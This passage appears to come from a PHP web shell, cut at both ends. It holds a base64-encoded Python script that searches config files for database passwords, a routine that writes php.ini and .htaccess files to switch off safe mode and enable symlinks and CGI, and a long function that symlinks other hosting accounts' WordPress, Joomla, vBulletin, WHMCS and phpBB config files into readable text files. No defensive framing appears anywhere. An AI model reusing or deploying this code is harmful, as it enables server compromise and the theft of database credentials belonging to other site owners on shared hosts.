VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=\';\r\n$file = fopen("cp.py","w+");\r\n$write = fwrite ($file ,base64_decode($cp));\r\nfclose($file);\r\nchmod("cp.py",0755);\r\n$url = $_POST[\'url\'];\r\necho"<center>\r\n<textarea cols=\\"90\\" rows=\\"20\\" name=\\"usernames\\">";\r\nsystem("python cp.py $url config");\r\nunlink (\'cp.py\');\r\necho"</textarea>\r\n</center>";\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\nif($_POST[\'matikan\']==\'sekatan\'){\r\n@error_reporting(0);\r\n$phpini =\r\n\'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==\';\r\n$file = fopen("php.ini","w+");\r\n$write = fwrite ($file ,base64_decode($phpini));\r\nfclose($file);\r\n$htaccess =\r\n\'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==\';\r\n$file = fopen(".htaccess","w+");\r\n$write = fwrite ($file ,base64_decode($htaccess));\r\necho "<hr><center><b>DONE!";\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\nif($_POST[\'mendapatkan\']==\'passwd\'){\r\n@set_magic_quotes_runtime(0);\r\nob_start();\r\nerror_reporting(0);\r\n@set_time_limit(0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0);\r\n$fn = $_POST[\'foldername\'];\r\n//all function here\r\n\r\nfunction syml($usern,$pdomain)\r\n\t{\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~